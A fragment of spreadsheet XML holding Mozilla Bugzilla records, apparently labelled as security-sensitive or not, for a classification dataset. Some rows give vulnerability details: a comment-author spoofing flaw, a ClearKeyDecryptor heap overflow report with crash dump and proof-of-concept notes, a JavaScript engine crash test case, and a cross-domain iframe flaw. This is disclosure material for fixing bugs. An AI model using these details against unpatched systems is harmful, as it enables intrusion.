      <c r="S1531" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T1531" t="n">
        <v>1</v>
      </c>
      <c r="U1531" t="n">
        <v>0</v>
      </c>
      <c r="V1531" t="n">
        <v>14</v>
      </c>
      <c r="W1531" t="inlineStr">
        <is>
          <t>[filed in security group, if you're not there, you won't get mail until bmo is
upgraded, and I hope that this is fixed by then, anyway. myk, if you disagree,
then open it up]
So, theres this form element, $::FORM{'who'}. And its used as the "comment added
by" user. Problem is, the only check done is that the user exists in the db (by
quietly_check_login). theres no check that I am that actual user.
Why is this there? Obsolete, or does it have some purpose? I couldn't see where
we ever add an input element with a name of 'who'. If the form element isn't
there, we use the logged in user's id to grab the name.
Its easy to check that the username matches the logged in user, but I wonder if
it may be better to get rid of this stuff entirely. I need to find out why its
there first, though...
A user can manually edit the bugs page to spoof the comment - I'll comment as
nobody@mozilla.org in a sec.
The only other thing which can be done by exploiting this is to change who
processmail thinks did the change, so if excludeSelf is set in the mail prefs,
you can make someone not get mail on a change you make. That ones minor, though.</t>
        </is>
      </c>
      <c r="X1531" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1532">
      <c r="A1532" t="n">
        <v>802206</v>
      </c>
      <c r="B1532" t="inlineStr">
        <is>
          <t>2012-10-16 09:38:56 -0700</t>
        </is>
      </c>
      <c r="C1532" t="inlineStr">
        <is>
          <t>[Facebook] Enable periodic sync for FB cached data</t>
        </is>
      </c>
      <c r="D1532" t="inlineStr">
        <is>
          <t>2013-01-13 16:50:19 -0800</t>
        </is>
      </c>
      <c r="E1532" t="n">
        <v>1</v>
      </c>
      <c r="F1532" t="n">
        <v>1</v>
      </c>
      <c r="G1532" t="n">
        <v>6</v>
      </c>
      <c r="H1532" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1532" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1532" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K1532" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1532" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1532" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1532" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1532" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1532" t="inlineStr">
        <is>
          <t>QARegressExclude</t>
        </is>
      </c>
      <c r="Q1532" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1532" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1532" t="inlineStr">
        <is>
          <t>DeveloperPhone</t>
        </is>
      </c>
      <c r="T1532" t="n">
        <v>1</v>
      </c>
      <c r="U1532" t="n">
        <v>0</v>
      </c>
      <c r="V1532" t="n">
        <v>6</v>
      </c>
      <c r="W1532" t="inlineStr">
        <is>
          <t>FB Data is stored in a local cache belonging to the Comms App. Contractually we must ensure to have fresh data on that cache ideally with a delay no longer than 24-48 hours. It is needed to implement a mechanism that keeps FB data updated as much as possible. 
The kind of FB data to be updated are friend images, user personal info or taking care of removing those contacts who are no longer friends. 
The sync process must occur behind the scenes and has to be as transparent as possible to the user. 
The bug should be marked as blocking basecamp as this is a contractual requirement from FB., otherwise we cannot deploy a device with deep FB integration.</t>
        </is>
      </c>
      <c r="X1532" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1533">
      <c r="A1533" t="n">
        <v>1274637</v>
      </c>
      <c r="B1533" t="inlineStr">
        <is>
          <t>2016-05-20 10:45:29 -0700</t>
        </is>
      </c>
      <c r="C1533" t="inlineStr">
        <is>
          <t>ZDI-CAN-3766: Mozilla Firefox ClearKeyDecryptor Heap Buffer Overflow Remote Code Execution Vulnerability</t>
        </is>
      </c>
      <c r="D1533" t="inlineStr">
        <is>
          <t>2017-03-12 12:15:15 -0700</t>
        </is>
      </c>
      <c r="E1533" t="n">
        <v>1</v>
      </c>
      <c r="F1533" t="n">
        <v>1</v>
      </c>
      <c r="G1533" t="n">
        <v>3</v>
      </c>
      <c r="H1533" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1533" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1533" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K1533" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1533" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1533" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1533" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1533" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1533" t="inlineStr">
        <is>
          <t>[adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q1533" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1533" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1533" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T1533" t="n">
        <v>1</v>
      </c>
      <c r="U1533" t="n">
        <v>0</v>
      </c>
      <c r="V1533" t="n">
        <v>20</v>
      </c>
      <c r="W1533" t="inlineStr">
        <is>
          <t>Created attachment 8754923
ZDI POC
We received the following report from Trending Micro's Zero Day
Initiative (ZDI):
ZDI-CAN-3766: Mozilla Firefox ClearKeyDecryptor Heap Buffer Overflow
Remote Code Execution Vulnerability
-- CVSS -----------------------------------------
6.8, AV:N/AC:M/Au:N/C:P/I:P/A:P
-- ABSTRACT -------------------------------------
Trend Micro's Zero Day Initiative has identified a vulnerability
affecting the following products:
  Mozilla Firefox
-- VULNERABILITY DETAILS ------------------------
Tested against Firefox 45.0.2 on Windows 8.1
```
(984.bac): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0253170d ebx=0252effd ecx=0000270d edx=00002710 esi=0252f000
edi=05174ffb
eip=672af26a esp=063efab8 ebp=05174ff8 iopl=0         nv up ei pl nz ac
pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000
efl=00010217
clearkey!memcpy+0x2a:
672af26a f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
0:004&gt; kv
ChildEBP RetAddr  Args to Child
063efabc 672a36fb 05174ff8 0252effd 00002710 clearkey!memcpy+0x2a (FPO:
[3,0,2]) (CONV: cdecl) [f:\dd\vctools\crt\crtw32\string\i386\memcpy.asm
@ 188]
063efb04 672a366e 0252eff8 00000004 00000000
clearkey!ClearKeyDecryptor::Decrypt+0x5c (FPO: [3,10,0]) (CONV:
thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\gmp-clearkey\0.1\clearkeydecryptionmanager.cpp
@ 182]
063efb20 672a5e2a 02200fa8 02200fcc 063efb90
clearkey!ClearKeyDecryptionManager::Decrypt+0x3b (FPO: [2,0,4]) (CONV:
thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\gmp-clearkey\0.1\clearkeydecryptionmanager.cpp
@ 138]
063efb48 672ab4ec 02200fa8 5ca1ff99 03109450
clearkey!VideoDecoder::DecodeTask+0x84 (FPO: [Non-Fpo]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\gmp-clearkey\0.1\videodecoder.cpp
@ 167]
063efb50 5ca1ff99 03109450 5b9cfd3d 063efc88
clearkey!gmp_task_args_m_1&lt;VideoDecoder *,void (__thiscall
VideoDecoder::*)(VideoDecoder::DecodeData *),VideoDecoder::DecodeData
*&gt;::Run+0xe (FPO: [0,0,0]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\media\gmp-clearkey\0.1\gmp-task-utils-generated.h
@ 133]
063efb58 5b9cfd3d 063efc88 0311b8e0 063efbc0
xul!mozilla::gmp::Runnable::Run+0xb (FPO: [0,0,4]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\dom\media\gmp\gmpplatform.cpp
@ 41]
063efbc0 5b9cf5d1 063efc88 063efc88 03104b08
xul!MessageLoop::DoWork+0x19c (FPO: [Non-Fpo]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc
@ 459]
063efc08 5b9cfff3 063efc88 0ff0bb96 5bca3c39
xul!base::MessagePumpDefault::Run+0x2e (FPO: [Non-Fpo]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_pump_default.cc
@ 35]
063efc40 5b9d0039 03104b1c 00000001 7503ef00
xul!MessageLoop::RunHandler+0x20 (FPO: [SEH]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc
@ 228]
063efc60 5c026784 5bca3c39 063efd5c 03119610 xul!MessageLoop::Run+0x19
(FPO: [Non-Fpo]) (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\message_loop.cc
@ 202]
063efd44 5bca3c42 770f4198 03104b08 770f4170
xul!base::Thread::ThreadMain+0x382b3d (CONV: thiscall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\thread.cc
@ 175]
063efd48 770f4198 03104b08 770f4170 ba9c818e xul!`anonymous
namespace'::ThreadFunc+0x9 (FPO: [1,0,0]) (CONV: stdcall)
[c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\ipc\chromium\src\base\platform_thread_win.cc
@ 27]
063efd5c 77722cb1 03104b08 100f92e3 00000000
KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
063efda4 77722c7f ffffffff 7774e75f 00000000
ntdll!__RtlUserThreadStart+0x2b (FPO: [SEH])
063efdb4 00000000 5bca3c39 03104b08 00000000
ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
0:004&gt; !lmi clearkey
Loaded Module Info: [clearkey]
         Module: clearkey
   Base Address: 672a0000
     Image Name: C:\Program Files\Mozilla
Firefox\gmp-clearkey\0.1\clearkey.dll
   Machine Type: 332 (I386)
     Time Stamp: 57070eac Thu Apr 07 18:51:40 2016
           Size: 32000
       CheckSum: 33f5d
Characteristics: 2122
Debug Data Dirs: Type  Size     VA  Pointer
             CODEVIEW    82, 297a8,   27fa8 RSDS - GUID:
{94D222EF-9D7F-45FF-81C0-C0F16ADA8872}
               Age: 2, Pdb:
c:\builds\moz2_slave\rel-m-rel-w32_bld-000000000000\build\obj-firefox\media\gmp-clearkey\0.1\clearkey.pdb
                   ??    14, 2982c,   2802c [Data not mapped]
                CLSID     4, 29840,   28040 [Data not mapped]
     Image Type: MEMORY   - Image read successfully from loaded memory.
    Symbol Type: PDB      - Symbols loaded successfully from image header.
z:\export\symbols\clearkey.pdb\94D222EF9D7F45FF81C0C0F16ADA88722\clearkey.pdb
       Compiler: Linker - front end [0.0 bld 0] - back end [12.0 bld 30723]
    Load Report: private symbols &amp; lines, source indexed
z:\export\symbols\clearkey.pdb\94D222EF9D7F45FF81C0C0F16ADA88722\clearkey.pdb
0:004&gt; lmvm clearkey
start    end        module name
672a0000 672d2000   clearkey   (private pdb symbols)
z:\export\symbols\clearkey.pdb\94D222EF9D7F45FF81C0C0F16ADA88722\clearkey.pdb
    Loaded symbol image file: C:\Program Files\Mozilla
Firefox\gmp-clearkey\0.1\clearkey.dll
    Image path: C:\Program Files\Mozilla
Firefox\gmp-clearkey\0.1\clearkey.dll
    Image name: clearkey.dll
    Timestamp:        Thu Apr 07 18:51:40 2016 (57070EAC)
    CheckSum:         00033F5D
    ImageSize:        00032000
    File version:     45.0.2.5941
    Product version:  45.0.2.5941
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: clearkey.dll
    ProductVersion:   45.0.2
    FileVersion:      45.0.2
    FileDescription:  45.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla
0:004&gt; vertarget
Windows 8 Version 9600 UP Free x86 compatible
Product: WinNt, suite: SingleUserTS
kernel32.dll version: 6.3.9600.17415 (winblue_r4.141028-1500)
Machine Name:
Debug session time: Mon Apr 18 12:07:56.520 2016 (UTC - 7:00)
System Uptime: 0 days 2:05:09.672
Process Uptime: 0 days 0:00:57.841
  Kernel time: 0 days 0:00:00.046
  User time: 0 days 0:00:00.031
```
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
   Anonymous working with Trend Micro's Zero Day Initiative
----
The readme on the POC states:
Firefox 45.0.1 ClearKeyDecryptor::Decrypt() (media/gmp-clearkey/0.1/ClearKeyDecryptionManager.cpp) heap overflow.
The problem is that we fully control aBufferSize, ClearBytes and CipherBytes arrays.
To debug you will need to attach to plugin-container.exe (clearkey.dll should be loaded).
How to test:
1) copy all files from this directory to www dir
2) open index.html
3) alert will pop up, attach to plugin-container.exe
4) back to firefox, press OK to continue</t>
        </is>
      </c>
      <c r="X1533" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1534">
      <c r="A1534" t="n">
        <v>1209358</v>
      </c>
      <c r="B1534" t="inlineStr">
        <is>
          <t>2015-09-28 17:49:58 -0700</t>
        </is>
      </c>
      <c r="C1534" t="inlineStr">
        <is>
          <t>Valgrind: Use of uninitialised value BrotliDecompress (decode.c:964)</t>
        </is>
      </c>
      <c r="D1534" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:24 -0700</t>
        </is>
      </c>
      <c r="E1534" t="n">
        <v>1</v>
      </c>
      <c r="F1534" t="n">
        <v>1</v>
      </c>
      <c r="G1534" t="n">
        <v>3</v>
      </c>
      <c r="H1534" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1534" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1534" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1534" t="inlineStr">
        <is>
          <t>41 Branch</t>
        </is>
      </c>
      <c r="L1534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1534" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1534" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1534" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1534" t="inlineStr">
        <is>
          <t>[adv-main44+]</t>
        </is>
      </c>
      <c r="Q1534" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1534" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1534" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1534" t="n">
        <v>1</v>
      </c>
      <c r="U1534" t="n">
        <v>0</v>
      </c>
      <c r="V1534" t="n">
        <v>4</v>
      </c>
      <c r="W1534" t="inlineStr">
        <is>
          <t>Created attachment 8667036
call_stack.txt
Not sure which component this should go under so I copied bug 366559 for now.
I am fuzzing commit https://github.com/google/brotli/commit/ca29aa22c295daac15baf5d85427ecc7808b515c
This is the version of brotli currently shipping in Firefox (https://hg.mozilla.org/mozilla-central/log/tip/modules/brotli/dec/decode.c).
It is currently used in WOFF2.</t>
        </is>
      </c>
      <c r="X1534" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1535">
      <c r="A1535" t="n">
        <v>781859</v>
      </c>
      <c r="B1535" t="inlineStr">
        <is>
          <t>2012-08-10 10:23:06 -0700</t>
        </is>
      </c>
      <c r="C1535" t="inlineStr">
        <is>
          <t>Assertion failure: lifetime &amp;&amp; lifetime-&gt;head == uint32_t(head - outerScript-&gt;code) &amp;&amp; lifetime-&gt;entry == uint32_t(entryTarget - outerScript-&gt;code), at methodjit/LoopState.cpp:80</t>
        </is>
      </c>
      <c r="D1535" t="inlineStr">
        <is>
          <t>2013-03-18 13:06:00 -0700</t>
        </is>
      </c>
      <c r="E1535" t="n">
        <v>1</v>
      </c>
      <c r="F1535" t="n">
        <v>1</v>
      </c>
      <c r="G1535" t="n">
        <v>3</v>
      </c>
      <c r="H1535" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1535" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1535" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1535" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1535" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1535" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1535" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1535" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1535" t="inlineStr">
        <is>
          <t>[js:p1:fx18] [jsbugmon:update,ignore][adv-track-main17+]</t>
        </is>
      </c>
      <c r="Q1535" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1535" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1535" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T1535" t="n">
        <v>1</v>
      </c>
      <c r="U1535" t="n">
        <v>0</v>
      </c>
      <c r="V1535" t="n">
        <v>39</v>
      </c>
      <c r="W1535" t="inlineStr">
        <is>
          <t>The following test asserts on mozilla-central revision b5ae446888f5 (options -m -n -a):
function e() {
    try {} catch (e) {
    return (actual = "FAIL");
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
      a.x + a.x + a.x + a.x + a.x + a.x + a.x + a.x
    }
    while (t) continue;
}
e();
I believe this is something different than bug 741110 and bug 770089 since the test looks entirely different and doesn't depend on mjitChunkLimit. S-s due to previous bugs with that assertion being security-relevant.</t>
        </is>
      </c>
      <c r="X1535" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1536">
      <c r="A1536" t="n">
        <v>701071</v>
      </c>
      <c r="B1536" t="inlineStr">
        <is>
          <t>2011-11-09 09:59:55 -0800</t>
        </is>
      </c>
      <c r="C1536" t="inlineStr">
        <is>
          <t>&lt;iframe&gt; element is exposed across domains by its name attribute</t>
        </is>
      </c>
      <c r="D1536" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:48 -0700</t>
        </is>
      </c>
      <c r="E1536" t="n">
        <v>1</v>
      </c>
      <c r="F1536" t="n">
        <v>1</v>
      </c>
      <c r="G1536" t="n">
        <v>3</v>
      </c>
      <c r="H1536" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1536" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1536" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K1536" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1536" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1536" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1536" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1536" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1536" t="inlineStr">
        <is>
          <t>[sg:high][qa?]</t>
        </is>
      </c>
      <c r="Q1536" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1536" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1536" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1536" t="n">
        <v>1</v>
      </c>
      <c r="U1536" t="n">
        <v>0</v>
      </c>
      <c r="V1536" t="n">
        <v>59</v>
      </c>
      <c r="W1536" t="inlineStr">
        <is>
          <t>Alex Dvorov reported this to security@m.o:
A form can be submitted to a named iframe in another domain if you know the name attribute of the iframe element.
This is a regression, as Firefox 3.6 creates a new top-level window to which the form is submitted if the named iframe doesn't exist within the current window.  This is the same behavior as the current version of Chrome.
I'm setting this as moderate severity, because most high bugs involve stealing information or running script in the context of another site, but this is still bad. You could easily use this to spoof the content in another site if you know the name of an iframe there.  I could be persuaded that this is in fact a high bug.</t>
        </is>
      </c>
      <c r="X1536" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1537">
      <c r="A1537" t="n">
        <v>1478995</v>
      </c>
      <c r="B1537" t="inlineStr">
        <is>
          <t>2018-07-27 07:44:16 -0700</t>
        </is>
      </c>
      <c r="C1537" t="inlineStr">
        <is>
          <t>get NodeJS 8.11.3 built and used as a toolchain in continuous integration</t>
        </is>
      </c>
      <c r="D1537" t="inlineStr">
        <is>
          <t>2018-08-23 02:50:13 -0700</t>
        </is>
      </c>
      <c r="E1537" t="n">
        <v>1</v>
      </c>
      <c r="F1537" t="n">
        <v>1</v>
      </c>
      <c r="G1537" t="n">
        <v>7</v>
      </c>
      <c r="H1537" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1537" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J1537" t="inlineStr">
        <is>
          <t>Toolchains</t>
        </is>
      </c>
      <c r="K1537" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1537" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1537" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1537" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1537" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1537" t="inlineStr"/>
      <c r="Q1537" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1537" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1537" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T1537" t="n">
        <v>1</v>
      </c>
      <c r="U1537" t="n">
        <v>0</v>
      </c>
      <c r="V1537" t="n">
        <v>30</v>
      </c>
      <c r="W1537" t="inlineStr">
        <is>
          <t>This is the first piece of getting NodeJS into the tree.  Landing it will pave the way for the next chunks of allowing uses of node from moz.build to be debugged in-tree, which will in turn make things easier on the devtools team to get their debugger patches (bug 1461714) in shape for landing.
Landing this should have no effect on the day-to-day workflow of developers.</t>
        </is>
      </c>
      <c r="X1537" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1538">
      <c r="A1538" t="n">
        <v>1470541</v>
      </c>
      <c r="B1538" t="inlineStr">
        <is>
          <t>2018-06-22 12:33:32 -0700</t>
        </is>
      </c>
      <c r="C1538" t="inlineStr">
        <is>
          <t>Crash in @0x0 | mozilla::wr::RenderCompositorANGLE::GetDeviceOfEGLDisplay</t>
        </is>
      </c>
      <c r="D1538" t="inlineStr">
        <is>
          <t>2018-07-11 18:52:53 -0700</t>
        </is>
      </c>
      <c r="E1538" t="n">
        <v>1</v>
      </c>
      <c r="F1538" t="n">
        <v>1</v>
      </c>
      <c r="G1538" t="n">
        <v>3</v>
      </c>
      <c r="H1538" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1538" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1538" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K1538" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1538" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1538" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1538" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1538" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1538" t="inlineStr">
        <is>
          <t>[gfx-noted]</t>
        </is>
      </c>
      <c r="Q1538" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1538" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1538" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T1538" t="n">
        <v>1</v>
      </c>
      <c r="U1538" t="n">
        <v>0</v>
      </c>
      <c r="V1538" t="n">
        <v>4</v>
      </c>
      <c r="W1538" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-c2b2aa20-7606-4a4c-be12-4d39c0180615.
=============================================================
Small volume Windows regression which seems to have started using 20180614100146:   https://bit.ly/2KexV7i. Bug 1364504 landed in that timeframe.
Possible regression range based on crash stats: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=0344af5522398276a98629b66df90cca6f395245&amp;tochange=91db0c695f0272f00bf92c81c471a85101056d96
Top 10 frames of crashing thread:
0  @0x0 
1 xul.dll mozilla::wr::RenderCompositorANGLE::GetDeviceOfEGLDisplay gfx/webrender_bindings/RenderCompositorANGLE.cpp:61
2 xul.dll mozilla::wr::RenderCompositorANGLE::Initialize gfx/webrender_bindings/RenderCompositorANGLE.cpp:117
3 xul.dll mozilla::wr::RenderCompositorANGLE::Create gfx/webrender_bindings/RenderCompositorANGLE.cpp:35
4 xul.dll mozilla::wr::NewRenderer::Run gfx/webrender_bindings/WebRenderAPI.cpp:59
5 xul.dll mozilla::wr::RenderThread::RunEvent gfx/webrender_bindings/RenderThread.cpp:271
6 xul.dll mozilla::detail::RunnableMethodImpl&lt;mozilla::wr::RenderThread*, void  xpcom/threads/nsThreadUtils.h:1216
7 xul.dll MessageLoop::DoWork ipc/chromium/src/base/message_loop.cc:534
8 xul.dll base::MessagePumpDefault::Run ipc/chromium/src/base/message_pump_default.cc:38
9 xul.dll MessageLoop::RunHandler ipc/chromium/src/base/message_loop.cc:318
=============================================================</t>
        </is>
      </c>
      <c r="X1538" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1539">
      <c r="A1539" t="n">
        <v>1609211</v>
      </c>
      <c r="B1539" t="inlineStr">
        <is>
          <t>2020-01-14 11:00:47 -0800</t>
        </is>
      </c>
      <c r="C1539" t="inlineStr">
        <is>
          <t>Persist settings in URL</t>
        </is>
      </c>
      <c r="D1539" t="inlineStr">
        <is>
          <t>2020-09-02 09:36:11 -0700</t>
        </is>
      </c>
      <c r="E1539" t="n">
        <v>1</v>
      </c>
      <c r="F1539" t="n">
        <v>1</v>
      </c>
      <c r="G1539" t="n">
        <v>7</v>
      </c>
      <c r="H1539" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1539" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1539" t="inlineStr">
        <is>
          <t>Push Health</t>
        </is>
      </c>
      <c r="K1539" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1539" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1539" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1539" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1539" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1539" t="inlineStr"/>
      <c r="Q1539" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1539" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1539" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1539" t="n">
        <v>1</v>
      </c>
      <c r="U1539" t="n">
        <v>0</v>
      </c>
      <c r="V1539" t="n">
        <v>9</v>
      </c>
      <c r="W1539" t="inlineStr">
        <is>
          <t>We should persist the following in the URL:
1. Which metrics are expanded
2. Grouping (test path / platform)
3. Sort order (count / test path)</t>
        </is>
      </c>
      <c r="X1539" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1540">
      <c r="A1540" t="n">
        <v>528334</v>
      </c>
